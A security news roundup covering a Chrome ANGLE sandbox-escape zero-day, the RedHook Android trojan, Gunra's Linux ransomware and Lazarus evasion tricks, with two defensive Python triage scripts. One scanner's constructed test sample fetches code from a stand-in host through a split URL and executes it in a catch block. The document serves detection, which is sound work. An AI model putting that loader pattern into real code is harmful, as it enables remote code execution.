Chrome Vulnerability Impacts Multiple Platforms Including Apple Devices
Google’s Threat Analysis Group (TAG) has identified CVE-2025-6558, a high-severity zero-day vulnerability (CVSS 8.8) in the Chrome browser’s ANGLE and GPU components. The flaw is insufficient validation of untrusted input that reaches these components from web content, which lets a specially crafted web page escape the browser’s “sandbox”, the protective barrier that isolates web content from the rest of the device. In practical terms, a user only needs to visit a compromised or malicious website for an attacker to begin exploiting the vulnerability and potentially gain access to system resources beyond what the renderer is allowed to touch. Google confirmed that the vulnerability has been exploited in the wild but has not released details about who is behind the attacks or how widespread they are. Google shipped the fix in Chrome 138.0.7204.157/.158 and credited Clément Lecigne and Vlad Stolyarov of TAG with discovering and reporting the flaw. Although the issue was found in Chrome, it reaches well beyond Google’s browser: ANGLE is also used by other projects, including Apple’s WebKit engine (which powers Safari), so the exposure spans multiple platforms. Apple responded by pushing emergency security updates across iOS 18.6, iPadOS 18.6 and 17.7.9, macOS Sequoia 15.6, watchOS 11.6, tvOS 18.6, and visionOS 2.6. While there is no evidence yet of targeted attacks against Apple users, a flaw that can be triggered silently by ordinary web content is especially dangerous. Users on Windows, macOS, iOS, and Android should apply all available updates as soon as possible; Chromium-based browsers such as Edge and Brave carry the same component and need their own vendor updates. This incident highlights how a single flaw in a widely used browser component can quickly ripple across the entire tech ecosystem, and why continuous patching and security vigilance remain critical, even for everyday browsing.
RedHook: Sophisticated Android Trojan Mimicking Government and Financial Institutions
RedHook is a recently identified Android banking trojan that poses a growing threat across regions: it is not geographically restricted and can be adapted to target users in other countries by impersonating local institutions. Currently observed campaigns focus on Vietnamese entities, where the malware disguises itself as legitimate apps from trusted organizations, including government agencies, banks, and law enforcement. It spreads through phishing websites and look-alike domains, some hosted on AWS, that deliver malicious APK files and prompt users to sideload what appear to be official apps. Once the user grants it accessibility and overlay (draw-over-other-apps) permissions, RedHook takes control of the device: it monitors activity, logs keystrokes, captures the screen, draws fake login screens over genuine apps, and executes commands from its operators. A persistent connection to a command-and-control server enables real-time theft of login credentials, banking details, and identity documents without alerting the victim. Although the initial infection campaigns have been localized to Vietnam, RedHook’s infrastructure, delivery methods, and impersonation techniques are easily transferable to other regions. Code analysis reveals Chinese-language artifacts and ties to a broader ecosystem of phishing operations, suggesting development by a Chinese-speaking threat actor. Materials found in an exposed AWS S3 bucket link RedHook to earlier social-engineering campaigns, indicating an evolution toward more complex, automated malware operations. The trojan supports over 30 remote commands, from remote app control to rebooting the device, a level of functionality comparable to desktop RATs. This makes RedHook a high-risk tool capable of enabling financial fraud, identity theft, and surveillance at scale, especially in environments where mobile device security remains under-resourced or poorly monitored. For defenders, the practical signal is the permission combination: a sideloaded app that declares an accessibility service and requests the overlay permission (often alongside SMS access) is the pattern to hunt for in mobile device management inventories and APK triage.
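The permission combination described above is something an analyst can check mechanically. The following is an added example, not code from the original report or from any RedHook analysis: it scores a decoded AndroidManifest.xml (as produced by apktool or similar) for the accessibility-service plus overlay pattern and common companion permissions. The two manifests, the package names, and the weights are constructed for the demo and are assumptions of this example, not indicators from the report.

```python
"""Triage a decoded Android manifest for RedHook-style takeover capabilities.

Added example, not from the original report. The weights and the sample
manifests below are this example's assumptions, not published indicators.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
A = "{%s}" % ANDROID_NS  # ElementTree key prefix for android: attributes

# Capabilities the report describes (overlay + accessibility) plus the usual
# companions of Android banking trojans. Weights are arbitrary for the demo.
WEIGHTS = {
    "accessibility_service": 4,                            # keylogging, UI control
    "android.permission.SYSTEM_ALERT_WINDOW": 3,           # overlay / fake login screens
    "android.permission.READ_SMS": 2,                      # OTP theft
    "android.permission.RECEIVE_SMS": 2,
    "android.permission.REQUEST_INSTALL_PACKAGES": 2,      # dropper behaviour
    "android.permission.RECEIVE_BOOT_COMPLETED": 1,        # persistence
    "android.permission.FOREGROUND_SERVICE": 1,
}

ACCESSIBILITY_BIND = "android.permission.BIND_ACCESSIBILITY_SERVICE"
ACCESSIBILITY_ACTION = "android.accessibilityservice.AccessibilityService"


def analyze_manifest(xml_text):
    """Return the weighted capabilities found in a decoded manifest."""
    root = ET.fromstring(xml_text)
    declared = {e.get(A + "name") for e in root.iter("uses-permission")}
    found = {p for p in declared if p in WEIGHTS}

    # An accessibility service is a <service> protected by the bind permission
    # and registered for the AccessibilityService intent action.
    for svc in root.iter("service"):
        if svc.get(A + "permission") != ACCESSIBILITY_BIND:
            continue
        actions = {a.get(A + "name") for a in svc.iter("action")}
        if ACCESSIBILITY_ACTION in actions:
            found.add("accessibility_service")

    takeover = {"accessibility_service",
                "android.permission.SYSTEM_ALERT_WINDOW"} <= found
    return {
        "package": root.get("package"),
        "capabilities": sorted(found),
        "score": sum(WEIGHTS[k] for k in found),
        "takeover_capable": takeover,  # the overlay + accessibility combination
    }


# Constructed sample: a fake "bank" app with the takeover combination.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.fakebank">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <application android:label="Bank">
        <service android:name=".A11yService"
            android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE">
            <intent-filter>
                <action android:name="android.accessibilityservice.AccessibilityService"/>
            </intent-filter>
        </service>
    </application>
</manifest>
"""

# Constructed sample: an ordinary app that only talks to the network.
BENIGN_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.weather">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <application android:label="Weather"/>
</manifest>
"""

if __name__ == "__main__":
    for text in (SAMPLE_MANIFEST, BENIGN_MANIFEST):
        print(analyze_manifest(text))
```

Run it against every APK in an MDM export after decoding with apktool, and triage anything where `takeover_capable` is true and the package was not installed from a managed store. The score is deliberately simple; legitimate accessibility tools will trigger it, so it is a prioritisation aid rather than a verdict.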
Update: Gunra Ransomware Expands Targeting with New Linux Variant
The Gunra ransomware group has widened its reach by introducing a Linux variant, marking a shift from its original focus on Windows systems and reflecting the broader trend of ransomware campaigns targeting multiple platforms. First detected in April 2025, Gunra has quickly established a presence across several countries, including the U.S., Japan, and Brazil, hitting industries ranging from healthcare and manufacturing to government and consulting. One of its most high-profile incidents reportedly involved the theft of 40 terabytes of data from a hospital in Dubai. With 14 victims listed on its leak site to date, Gunra has proven active and adaptable. The Linux variant takes its configuration from command-line arguments at runtime rather than from values hard-coded in the binary, letting operators choose which paths to encrypt, how aggressively to run, and how visibly to operate; this adds complexity for defenders, because two samples can behave very differently, and reduces the chances of recovery. What sets this variant apart is its multi-threaded encryption, with up to 100 parallel threads locking files. It uses a hybrid scheme combining RSA and ChaCha20 (ChaCha20 for the bulk file data, with the symmetric key protected by RSA so only the operator’s private key can recover it) and lets attackers limit how much of each file is encrypted through command-line options, which speeds up the attack on large data sets while still rendering files unusable. By default it leaves no ransom note, favoring disruption over negotiation, which suggests its main goal is operational damage. Trend Micro’s analysis provides insight and detection guidance that security teams can use to track and block this threat early. Defending against Gunra requires layered protections: regular patching, a current asset inventory, strong configuration controls, and user training, with Linux servers included in backup, monitoring, and EDR coverage. As ransomware groups move beyond traditional targets, Linux environments can no longer be overlooked in security planning.
Update: Lazarus Group Enhances Attack Techniques in Ongoing “Contagious Interview” Campaign
North Korea’s Lazarus Group continues to evolve its cyber operations by refining how it delivers malware in its “Contagious Interview” campaign. Instead of embedding the malicious code directly in the files it distributes, the group now designs its tools to fetch and execute the payload only after the program is already running. In one case, the malware sends a background request to a server under the attackers’ control and then quietly executes whatever it receives, bypassing security tools that inspect code before a program starts, since the file on disk contains nothing malicious to find. A second method splits the malicious server address into small string fragments that are only reassembled at runtime, so scanners and indicator lists that look for a complete URL never see one. The group also abuses legitimate services, including a trusted hosting platform, to stage the payload: the hosted resource looks harmless, returning something as simple as a website icon, and only serves the real attack when specific conditions are met. A third method shows how far the creativity goes. Rather than using well-known loader techniques that security software might recognize, the malware deliberately triggers an error and places the payload execution in the error-handling path, so the code runs only when the fake error occurs. Across all these methods the goal is the same: avoid detection by changing how and when the malicious code appears. These tactics make it harder for tools that only scan code before it runs to keep up. The attackers also appear to be using automation or artificial intelligence to rapidly generate and refine variants, which could explain the occasional code errors. The trend indicates that organizations will need to strengthen real-time detection of suspicious behavior (runtime code execution from network data, outbound connections from build or interview tooling, and code running from error handlers) rather than rely solely on identifying known malicious files in advance.
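The three evasion patterns above (fetch-then-execute, split URL fragments, and execution from an error handler) can be surfaced by a simple static triage pass before a package is run. The following is an added example, not code from the original article or from any published Lazarus analysis: a heuristic scanner over JavaScript source text. The two snippets it scans are constructed for the demo and are not real samples; the regexes and the hostname `cdn.example.test` are this example’s assumptions.

```python
"""Heuristic triage for three runtime-evasion patterns in JavaScript source.

Added example, not from the original article. It flags patterns for a human
to review; a hit is a reason to look, not proof of malice.
"""
import re

# Code-execution sinks in Node/browser JavaScript.
SINK_RE = re.compile(
    r"\beval\s*\(|\bnew\s+Function\s*\(|\bvm\.run(?:InThisContext|InNewContext|InContext)\s*\("
)
# Network calls whose response could be fed into a sink.
NET_RE = re.compile(
    r"\bfetch\s*\(|\bhttps?\.(?:get|request)\s*\(|\baxios\.(?:get|post)\s*\(|\bXMLHttpRequest\b"
)
URL_RE = re.compile(r"^https?://", re.I)
# Single- and double-quoted string literals, honouring backslash escapes.
LITERAL_RE = re.compile(r"'((?:[^'\\]|\\.)*)'|\"((?:[^\"\\]|\\.)*)\"")
CATCH_RE = re.compile(r"\bcatch\b(?:\s*\([^)]*\))?\s*\{")


def find_split_urls(src):
    """URLs assembled from two or more adjacent literals joined by + or , ."""
    hits = []
    chain = []  # (literal text, end offset) of the current run of literals

    def flush():
        if len(chain) >= 2:
            joined = "".join(t for t, _ in chain)
            # Only a split URL if no single fragment is itself a URL.
            if URL_RE.match(joined) and not any(URL_RE.match(t) for t, _ in chain):
                hits.append(joined)
        chain.clear()

    for m in LITERAL_RE.finditer(src):
        text = m.group(1) if m.group(1) is not None else m.group(2)
        if chain:
            gap = src[chain[-1][1]:m.start()]
            if re.fullmatch(r"\s*[+,]\s*", gap):   # 'a' + 'b'  or  ['a', 'b'].join('')
                chain.append((text, m.end()))
                continue
            flush()
        chain.append((text, m.end()))
    flush()
    return hits


def find_catch_sinks(src):
    """Code-execution sinks placed inside catch blocks (error-path execution)."""
    hits = []
    for m in CATCH_RE.finditer(src):
        open_idx = m.end() - 1          # index of the catch block's '{'
        depth, i = 0, open_idx
        while i < len(src):             # brace-match to find the block's end
            if src[i] == "{":
                depth += 1
            elif src[i] == "}":
                depth -= 1
                if depth == 0:
                    break
            i += 1
        body = src[open_idx + 1:i]
        if SINK_RE.search(body):
            hits.append(" ".join(body.split()))
    return hits


def scan(src):
    """Run all three heuristics and count the indicators found."""
    split_urls = find_split_urls(src)
    catch_sinks = find_catch_sinks(src)
    # Crude co-occurrence check: a network call and a sink in the same file.
    fetch_then_execute = bool(NET_RE.search(src) and SINK_RE.search(src))
    return {
        "fetch_then_execute": fetch_then_execute,
        "split_urls": split_urls,
        "catch_sinks": catch_sinks,
        "indicators": len(split_urls) + len(catch_sinks) + int(fetch_then_execute),
    }


# Constructed sample showing all three patterns (not a real malware sample).
SUSPICIOUS_SAMPLE = """
const u = 'ht' + 'tp://' + 'cdn.' + 'example.test' + '/favicon.ico';
fetch(u).then(r => r.text()).then(body => {
  try { JSON.parse(body); }
  catch (e) { new Function(body)(); }
});
"""

# Constructed benign sample: fetches JSON and only logs it.
BENIGN_SAMPLE = """
const url = 'https://example.test/api/status';
fetch(url).then(r => r.json()).then(j => console.log(j.ok));
"""

if __name__ == "__main__":
    for name, text in (("suspicious", SUSPICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(name, scan(text))
```

Point it at the `node_modules` tree of a take-home assignment or interview project before anything in it is executed, and treat a file with two or more indicators as one to open by hand. The co-occurrence check for fetch-then-execute is deliberately loose; a proper implementation would track data flow from the response body to the sink, but even this version catches the shape the report describes.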